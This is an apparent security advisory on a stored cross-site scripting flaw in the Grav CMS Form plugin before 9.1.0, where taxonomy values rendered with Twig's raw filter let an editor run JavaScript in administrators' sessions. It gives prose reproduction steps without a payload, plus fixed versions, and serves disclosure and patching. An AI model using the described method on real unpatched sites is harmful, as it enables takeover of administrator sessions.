Grav CMS Form Plugin Stored Cross-Site Scripting Vulnerability

A stored cross-site scripting vulnerability has been identified in the Grav CMS Form plugin, specifically in the select field template. This issue affects versions prior to 9.1.0. The vulnerability arises because taxonomy tag and category values are rendered using the Twig |raw filter in the admin panel, which bypasses the global autoescape protection. As a result, an editor-level user can inject arbitrary JavaScript that executes in the browser session of any administrator who views or edits a page in the admin panel. The vulnerability is cross-page, as a malicious taxonomy value can impact the entire admin panel.

Impact

Exploitation of this vulnerability allows for stored cross-site scripting, where injected scripts are executed in the context of an administrator's browser session.

Reproduction

To reproduce this vulnerability, log in as an editor and create a page with a malicious taxonomy value that includes JavaScript payloads. When an administrator views or edits any page, the injected script will execute.

Remediation

Users can update to Grav Form Plugin version 9.1.0 or later, and Grav CMS version 2.0.0-beta.2 or later, to address this vulnerability.